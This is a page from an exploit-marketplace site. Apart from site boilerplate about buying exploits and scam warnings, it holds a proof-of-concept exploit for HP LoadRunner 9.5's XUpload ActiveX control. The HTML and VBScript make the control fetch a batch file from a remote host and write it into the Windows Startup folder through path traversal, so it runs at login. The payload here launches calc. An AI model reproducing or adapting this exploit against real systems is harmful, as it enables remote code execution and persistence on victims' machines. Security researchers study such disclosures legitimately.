0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
HP LoadRunner 9.5 remote file creation PoC
========================================== HP LoadRunner 9.5 remote file creation PoC ========================================== # Title: HP LoadRunner 9.5 remote file creation PoC # CVE-ID: () # OSVDB-ID: () # Author: Pyrokinesis # Published: 2009-09-29 # Verified: yes view source print? <!-- HP LoadRunner 9.5 Persits.XUpload.2 control (XUpload.ocx) MakeHttpRequest() remote file creation poc (IE 8) by Nine:Situations:Group::pyrokinesis CLSID: {E87F6C8E-16C0-11D3-BEF7-009027438003} Progid: Persits.XUpload.2 Binary Path: C:\Programmi\HP\LoadRunner\bin\XUpload.ocx KillBitted: False Implements IObjectSafety: True Safe For Initialization (IObjectSafety): True Safe For Scripting (IObjectSafety): True --> expl.txt code: cmd /c start calc --> <html> <object classid='clsid:E87F6C8E-16C0-11D3-BEF7-009027438003' id='XUPLOADLib' /> </object> <script language='vbscript'> ' http://host/expl.txt , a batch script that starts calc.exe XUPLOADLib.Server = "host" XUPLOADLib.Script = "expl.txt" ' place it in the Startup folder, italian path, change for your os Method="" Params="" Path="..\\..\\..\\Documents and Settings\All Users.WINDOWS\Menu Avvio\Programmi\Esecuzione automatica\\sh.cmd" UserAgent="" Headers="" XUPLOADLib.MakeHttpRequest Method ,Params ,Path ,UserAgent ,Headers </script> # 0day.today [2024-12-24] #